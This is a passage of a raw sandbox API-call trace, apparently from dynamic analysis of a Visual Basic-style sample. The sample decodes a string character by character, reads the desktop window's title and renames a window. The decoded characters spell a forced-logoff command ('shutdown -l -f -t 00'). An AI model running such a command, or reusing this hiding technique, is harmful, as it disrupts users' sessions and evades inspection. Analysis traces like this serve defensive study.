cchWideChar=1 | out: lpWideCharStr="y") returned 1 [0181.513] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.514] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.514] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0181.515] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.516] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.516] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0181.516] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.518] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.518] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.518] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0181.518] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.519] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.519] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0181.520] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.520] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.520] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.521] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0181.521] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.569] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.569] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0181.569] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.570] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.570] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.570] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0181.570] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.571] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.571] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.571] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0181.571] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.572] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.572] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.572] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0181.572] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.572] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.573] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.573] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0181.573] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.573] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.573] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.574] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0181.574] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.574] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.574] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.574] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0181.574] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.575] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.575] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.575] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0181.575] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.576] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.576] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.576] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0181.576] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.577] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.577] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.577] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0181.577] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.577] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.578] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.578] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0181.578] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.578] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.579] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.579] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0181.579] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.579] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.580] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.580] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0181.580] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.580] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.581] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.581] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0181.581] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.581] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.581] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.582] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0181.582] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.582] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.582] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.582] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0181.583] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.583] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.583] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0181.583] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.584] GetForegroundWindow () returned 0x20086 [0181.584] GetLastError () returned 0x0 [0181.585] SysStringLen (param_1=" ") returned 0xff [0181.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0181.585] SysStringLen (param_1=" ") returned 0xff [0181.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0181.585] GetWindowTextA (in: hWnd=0x20086, lpString=0x11644c4, nMaxCount=255 | out: lpString="Program Manager") returned 15 [0181.585] GetLastError () returned 0x0 [0181.586] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0181.586] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0181.586] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0181.586] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Program Manager") returned 256 [0181.586] SysStringLen (param_1="Prog") returned 0x4 [0181.586] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Prog", cchWideChar=5, lpMultiByteStr=0x1150ca4, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Prog", lpUsedDefaultChar=0x0) returned 5 [0181.587] SetWindowTextA (hWnd=0x103c4, lpString="Prog") returned 1 [0181.587] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0181.587] GetFocus () returned 0x0 [0181.587] lstrlenA (lpString="Prog") returned 4 [0181.587] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x5) returned 0x10ebcd0 [0181.587] GetWindowTextA (in: hWnd=0x103c4, lpString=0x10ebcd0, nMaxCount=5 | out: lpString="Prog") returned 4 [0181.587] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x5, lParam=0x10ebcd0) returned 0x4 [0181.587] GetFocus () returned 0x0 [0181.588] lstrcmpA (lpString1="Prog", lpString2="Prog") returned 0 [0181.588] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0181.588] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0181.588] GetFocus () returned 0x0 [0181.588] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x5) returned 0x10ebcd0 [0181.588] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x5, lParam=0x10ebcd0) returned 0x4 [0181.588] GetFocus () returned 0x0 [0181.589] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Prog", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0181.589] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Prog", cbMultiByte=-1, lpWideCharStr=0x1150ca4, cchWideChar=5 | out: lpWideCharStr="Prog") returned 5 [0181.589] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0181.589] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0181.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.590] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.591] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="V", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="V") returned 1 [0181.591] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.591] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.591] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0181.592] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.592] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.592] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0181.592] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.594] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.594] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0181.594] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.594] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.594] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0181.595] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.595] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.595] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0181.596] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.596] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.596] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.596] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0181.596] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.597] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.597] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0181.597] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.598] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.598] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0181.598] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: 